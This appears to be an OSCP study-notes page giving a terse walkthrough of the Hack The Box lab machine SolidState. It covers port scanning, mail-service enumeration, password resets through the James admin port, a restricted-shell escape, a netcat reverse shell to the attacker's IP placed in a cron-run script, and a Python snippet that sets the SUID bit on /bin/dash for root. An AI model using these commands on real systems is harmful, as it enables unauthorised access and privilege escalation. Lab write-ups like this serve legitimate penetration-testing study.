O
O
OSCP Notes
Search…
HTB Write-up SolidState (Linux)
One thing I didn't do was to scan all ports.
There's 4555 open
Nmap Result:
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open pop3?
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
119/tcp open nntp?
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80:
SMTP enum:
found [email protected] for email
ismtp -h 10.129.29.189 -e email.txt
POP3 enum:
\
JAMES
running nmap -p 110,995 --script "pop3-capabilities or pop3-ntlm-info" -sV 10.129.29.189
nothing
brute forcing pop authentication with hydra...no luck?
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
119 NNTP Enum:
4555 RSIP
nc 10.129.29.189 4555
got in
reset password for users
signed in from Evolution and got a valuable email
Now we are in mindy!
when I first logged in, it had a restricted shell so I used the trick below.
ssh [email protected] -t "bash --noprofile"
According to the ssh manual page,
-t Force pseudo-terminal allocation. This can be used to exe‐
cute arbitrary screen-based programs on a remote machine,
which can be very useful, e.g. when implementing menu ser‐
vices. Multiple -t options force tty allocation, even if
ssh has no local tty.
now I can see other files.
let's see if we can connect via nc -e /bin/bash 10.10.14.131 1234
it worked!
Let's plug this in in the tmp.py
I waited for a min, and I got a root shell!
Another way to get the root:
#!/usr/bin/env python
import os
import sys
try:
os.system("chmod 4755 /bin/dash")
except:
sys.exit()
#4 -> setuid bit 755 default perm for most binary
dash -> another terminal. doesn't strip the setuid bit like bash doesn't.
so if we can set the SUID bit separately and execute it, then we can escalate privilege.
type "dash" to call the executable once the permission is confirmed to be changed to -rwsr
Copy link